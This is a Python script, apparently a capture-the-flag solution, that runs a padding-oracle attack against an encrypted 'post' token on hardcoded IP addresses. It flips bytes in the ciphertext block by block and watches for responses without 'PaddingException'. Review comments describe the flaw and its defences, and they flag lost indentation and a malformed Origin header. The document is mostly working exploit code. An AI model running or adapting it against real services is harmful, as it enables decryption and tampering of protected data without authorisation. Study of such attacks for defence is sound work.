
epb

a guest
Jan 26th, 2020
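#!/Library/Frameworks/Python.framework/Versions/3.7/bin/python3
"""Probe an encrypted "post" token for a padding-validity signal.

The script base64-decodes a captured token, splits it into 16-byte blocks,
overwrites the second-to-last block with a candidate value and requests the
page once per candidate. Every response whose body does not contain
"PaddingException" is printed.

The check only works because the response body differs when padding is
rejected. A service closes that gap by authenticating the token before it
decrypts it (encrypt-then-MAC or an AEAD mode) and by answering every
decryption failure with one uniform error. In server logs this kind of
probing shows up as a burst of requests to a single path whose "post"
values differ in one block only, most of them ending in a padding error.

NOTE(review): the paste lost its indentation. The nesting below assumes the
whole loop body sat under the original `if i != 1:` -- confirm against the
author's file.
"""

import base64

import requests

# Seconds allowed per HTTP call; the original passed no timeout, so a
# stalled server would block the script indefinitely.
REQUEST_TIMEOUT = 10
BLOCK_SIZE = 16

# The token travels in a URL-safe variant of base64: "~" for "=", "!" for
# "/" and "-" for "+". Source and target characters never overlap, so one
# translate() pass equals the original chained replace() calls.
_WIRE_TO_B64 = str.maketrans("~!-", "=/+")
_B64_TO_WIRE = str.maketrans("=/+", "~!-")

burp0_url = "http://34.74.105.127/0c09509317/"
burp0_headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) "
                  "Gecko/20100101 Firefox/72.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    # NOTE(review): the scheme appears twice in this value as pasted.
    "Origin": "http://http://35.190.155.168",
    "Connection": "close",
    "Referer": "http://34.74.105.127/73294cf70f",
    "Upgrade-Insecure-Requests": "1",
}
burp0_data = {"title": "", "body": "kakarot"}

# Only the status code of this POST is used; redirects are not followed.
encryptedResponse = requests.post(
    burp0_url,
    headers=burp0_headers,
    data=burp0_data,
    allow_redirects=False,
    timeout=REQUEST_TIMEOUT,
)
print(encryptedResponse.status_code)

# The author's disabled line read the token from the Location header of the
# response above (the part after the first "="); this run uses a fixed
# capture instead.
b64_ct_repl = (
    "OUe0h0AiEEILFmpWIfBJlcQ97QiZ-ugj1eeqR1xp5ToM0okTekP-oTnUlxlHwbNiiNoMbpO-"
    "FGxy0adyND6Gy67qzL325r4pic76O5JHrih9DhUwI4xBLjp4NhGYufF7w4Y4c!bD-LvinnI7c6W"
    "EBhxqFIZ8i7F8csn1MciP2NEgbrWx8QOFmk4uMdEUrq0!7DKKBQgkSH9PEpFHUjbu-A~~"
)

print("Ciphertext encoded with b64: " + b64_ct_repl)
ct = base64.b64decode(b64_ct_repl.translate(_WIRE_TO_B64))
ct_divided = [ct[i:i + BLOCK_SIZE] for i in range(0, len(ct), BLOCK_SIZE)]
ct_numberOfBlocks = len(ct_divided)

print("Changing the second Last block to XOR that with Last decrypted "
      "block. Dont worry, decryption is handled by the server")

# Loop-invariant: fifteen zero bytes followed by 0x01.
padding = bytes(15) + bytes([1])

for i in range(1, 254):
    if i == 1:
        # guess XOR padding would be an all-zero block here; the original
        # skips this value as well.
        continue

    guess = bytes(15) + bytes([i])
    ct_divided[ct_numberOfBlocks - 2] = bytes(a ^ b for a, b in zip(guess, padding))
    new_ct = b''.join(ct_divided)

    postContent = base64.b64encode(new_ct).decode('utf-8').translate(_B64_TO_WIRE)
    burp1_url = "http://35.190.155.168/08165c13b1/?post=" + postContent
    pt_resp = requests.get(burp1_url, headers=burp0_headers, timeout=REQUEST_TIMEOUT)

    # The marker string in the body is the only signal the script reads.
    if "PaddingException" not in pt_resp.text:
        print("GET URL: " + burp1_url)
        print(str(len(postContent)))
        print(pt_resp.text)
        print("For offset: " + str(i))

    # NOTE(review): what a body containing "multiple" signifies is not shown
    # on the page; the loop simply stops at the first such response.
    if "multiple" in pt_resp.text:
        print(pt_resp.text)
        break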